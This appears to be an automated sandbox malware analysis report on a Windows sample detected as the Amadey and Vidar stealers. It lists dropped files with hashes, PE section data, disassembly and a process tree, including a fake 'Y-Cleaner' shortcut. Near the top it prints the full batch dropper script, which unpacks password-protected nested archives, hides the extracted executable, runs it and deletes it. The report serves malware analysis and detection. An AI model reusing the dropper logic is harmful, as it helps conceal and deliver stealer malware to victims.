                                                                                                                                                                                                                              Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat Dec 21 01:16:04 2024, mtime=Sat Dec 21 01:16:04 2024, atime=Sat Dec 21 01:16:04 2024, length=1502720, window=hide
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2170
                                                                                                                                                                                                                              Entropy (8bit):3.8211005141915892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:80Iq3RjCmP15yDvN1WmG9WmhZ5yfqWmyyF:809BjCcyLNQaKytLy
                                                                                                                                                                                                                              MD5:8D188C9F854BBC859094744B12CE80AF
                                                                                                                                                                                                                              SHA1:DDDA7F70CCB428B2F622E85F3107986460B49B84
                                                                                                                                                                                                                              SHA-256:1158A29710C38247558A3D8A55A0D3F12F43DA67FB875795A8E7BD0B7E63736F
                                                                                                                                                                                                                              SHA-512:D39CB2A27FA9E24E42E9227E26169730E5096D158E0AA8C3AF433596D6EC38188B92A0026457255D0ABB9559244BCA22F6B11E91D439899259FB99E096F706E0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:L..................F.@.. ......INS..c..INS..c..INS..........................4.:..DG..Yr?.D..U..k0.&...&......vk.v....h...MS...k.INS......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b.....................j...L.o.c.a.l.....N.1......Y....Temp..:......CW.^.Y......l.......................~.T.e.m.p.....p.1......Y....1V1W92~1..X......Y...Y......h.....................4...1.v.1.w.9.2.N.e.C.w.3.S.K.G.K.e.d.e.t.....h.2......Y.. .Y-CLEA~1.EXE..L......Y...Y......m.........................Y.-.C.l.e.a.n.e.r...e.x.e.......r...............-.......q............b.......C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.7.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.1.v.1.w.9.2.N.e.C.w.3.S.K.G.K.e.d.e.t.\.Y.-.C.l.e.a.n.e.r...e.x.e.C.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.1.v.1.w.9.2.N.e.C.w.3.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2989568
                                                                                                                                                                                                                              Entropy (8bit):6.518795012161611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
                                                                                                                                                                                                                              MD5:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              SHA1:4424871CDFD4F9B4FB1039049A75844401A7C358
                                                                                                                                                                                                                              SHA-256:F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E
                                                                                                                                                                                                                              SHA-512:F38B986C639EB2C676E0ECD9316CEA437934550D772F5494E2589626E826A5D23954398C3E4EB4584594E5E6CBEA28FFE195BEA27D2674F1A8119CA14EE869A0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......Q....@.................................W...k.............................1..............................-1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyzzfcwd..*.......*.................@...cnrltnzy.....@1......x-.............@....taggant.0...P1.."...|-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                              Entropy (8bit):3.3738840009832742
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:awVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0l3t0:awRf2RKQ1CGAFAjzvYRQV3t0
                                                                                                                                                                                                                              MD5:ACA7EEC19B427F7599215E799A977328
                                                                                                                                                                                                                              SHA1:A1D98DC1AD3F21DD4414BD08187073E96B18374A
                                                                                                                                                                                                                              SHA-256:AAB4FB08E279F6F12599500058CDA9511455AC863A6590E445DF10C14A22F4FA
                                                                                                                                                                                                                              SHA-512:DC785FB72C87AACB5FDDABD96FA600724DF05CCD0CFC2CEE3AD87078B96ABB1C50CB9749BBC78089889BC52499DB77E1B79F6E2C5D2CD9C3F5535D6A8A2899F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:....\bO..*A.;..L.r5F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1058336
                                                                                                                                                                                                                              Entropy (8bit):6.827880169201504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:qvUGQWpy+Tac0RDffXJjyYpcyoNHSy5viczPESsQ3BaE32VfXJjyYpz:lGQB+2DR7BWYpcyo44u0aPVBWYpz
                                                                                                                                                                                                                              MD5:971B0519B1C0461DB6700610E5E9CA8E
                                                                                                                                                                                                                              SHA1:9A262218310F976AAF837E54B4842E53E73BE088
                                                                                                                                                                                                                              SHA-256:47CF75570C1ECA775B2DD1823233D7C40924D3A8D93E0E78C943219CF391D023
                                                                                                                                                                                                                              SHA-512:D234A9C5A1DA8415CD4D2626797197039F2537E98F8F43D155F815A7867876CBC1BF466BE58677C79A9199EA47D146A174998D21EF0AEBC29A4B0443F8857CB9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.m..........."...0......(........... ........@.. ....................... ............`.................................K...O....... %.............. r..........p...T............................................ ............... ..H............text........ ...................... ..`.rsrc... %.......&..................@..@.reloc..............................@..B........................H........7................................................................{8...*..{9...*..{:...*..{;...*..{<...*..{=...*..{>...*..{?...*..{@...*..{A...*..{B...*.0..\........(C.....}8.....}9.....}:......};......}<......}=......}>......}?......}@......}A......}B...*.0...........u.......;.....9....(D....{8....{8...oE...9....(F....{9....{9...oG...9....(H....{:....{:...oI...9....(J....{;....{;...oK...9....(L....{<....{<...oM...9....(N....{=....{=...oO...,w(P....{>....{>...oQ...,_(
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):147968
                                                                                                                                                                                                                              Entropy (8bit):6.454649285943866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyXzdEpx:A/rLVPW0nsP2Xy+TJfWzW7
                                                                                                                                                                                                                              MD5:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                              SHA1:50C8F5DB809CFEC84735C9F4DCD6B55D53DFD9F5
                                                                                                                                                                                                                              SHA-256:6FEC179C363190199C1DCDF822BE4D6B1F5C4895EBC7148A8FC9FA9512EEADE8
                                                                                                                                                                                                                              SHA-512:FCEA6D62DC047E40182DC4FF1E0522CA935F9AEEFDB1517957977BC5D9AC654285A973261401F3B98ABF1F6ED62638B9E31306FD7AAEB67214CA42DFC2888AF0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, Author: Joe Security
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(................................p#.........................................\............................................text...x........................... ....rdata...1.......2..................@..@.data....!!..0......................@....00cfg.......`#......*..............@..@.reloc.......p#......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                                                                              Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                                              MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                              SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                              SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                              SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):6.518795012161611
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                              File size:2'989'568 bytes
                                                                                                                                                                                                                              MD5:3799f4f2cfc27184ce70913f4ec3a8be
                                                                                                                                                                                                                              SHA1:4424871cdfd4f9b4fb1039049a75844401a7c358
                                                                                                                                                                                                                              SHA256:f95df3026cf4edcc3d334bfc20d188de06ea4e4497e94c63504b2b783dc3e55e
                                                                                                                                                                                                                              SHA512:f38b986c639eb2c676e0ecd9316cea437934550d772f5494e2589626e826a5d23954398c3e4eb4584594e5e6cbea28ffe195bea27d2674f1a8119ca14ee869a0
                                                                                                                                                                                                                              SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
                                                                                                                                                                                                                              TLSH:DFD54A92B50AB1CFD49E17B48067CD46BBAD43F98B2048C7A82D65BE7E63CC151B6C34
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                              Entrypoint:0x715000
                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              jmp 00007FD7ECB2E24Ah
                                                                                                                                                                                                                              haddps xmm5, dqword ptr [00000000h]
                                                                                                                                                                                                                              add cl, ch
                                                                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [edi], bh
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [ecx], cl
                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add dword ptr [edx], ecx
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              and al, 00h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              and dword ptr [eax], eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6a057          0x6b          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x69000          0x5d4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x312e10         0x10          uyzzfcwd
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x312dc0         0x18          uyzzfcwd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
          0x1000           0x68000       0x2de00   e7aa2b5db78b412f91f98889bda0ac2b  False     0.9983981181880109   data                  7.9890404804965165  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x69000          0x5d4         0x400     be27bfc0824df34a3c01a070f4d6f678  False     0.7109375            data                  5.8393818684583305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x6a000          0x1000        0x200     cc76e3822efdc911f469a3e3cc9ce9fe  False     0.1484375            data                  1.0428145631430756  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uyzzfcwd  0x6b000          0x2a9000      0x2a8400  00faefff446635bdb6d79e8a14b4bf55  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cnrltnzy  0x314000         0x1000        0x400     af9280a696a5cf1e57dcd85e1e3e83f4  False     0.7607421875         data                  6.051880691457294   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x315000         0x3000        0x2200    733bba7c850e5f3236464019639b8cb9  False     0.05618106617647059  DOS executable (COM)  0.6905175093846538  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name         RVA       Size   Type                                                      Language  Country        ZLIB Complexity
RT_MANIFEST  0x312e20  0x3e4  XML 1.0 document, ASCII text                                                       0.48092369477911645
RT_MANIFEST  0x313204  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727

DLL           Import
kernel32.dll  lstrcpy

Language of compilation system  Country where language is spoken  Map
English                         United States
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

Target ID:0
Start time:21:13:01
Start date:20/12/2024
Path:C:\Users\user\Desktop\file.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x50000
File size:2'989'568 bytes
MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1724316181.0000000004690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:1
Start time:21:13:06
Start date:20/12/2024
Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:0x6f0000
File size:2'989'568 bytes
MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1764848025.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:5
Start time:21:14:00
Start date:20/12/2024
Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:0x6f0000
File size:2'989'568 bytes
MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000003.2303212460.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:21:14:23
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:4'438'776 bytes
                                                                                                                                                                                                                              MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                              Imagebase:0x7ff73f470000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:mode 65,10
                                                                                                                                                                                                                              Imagebase:0x7ff7742b0000
                                                                                                                                                                                                                              File size:33'280 bytes
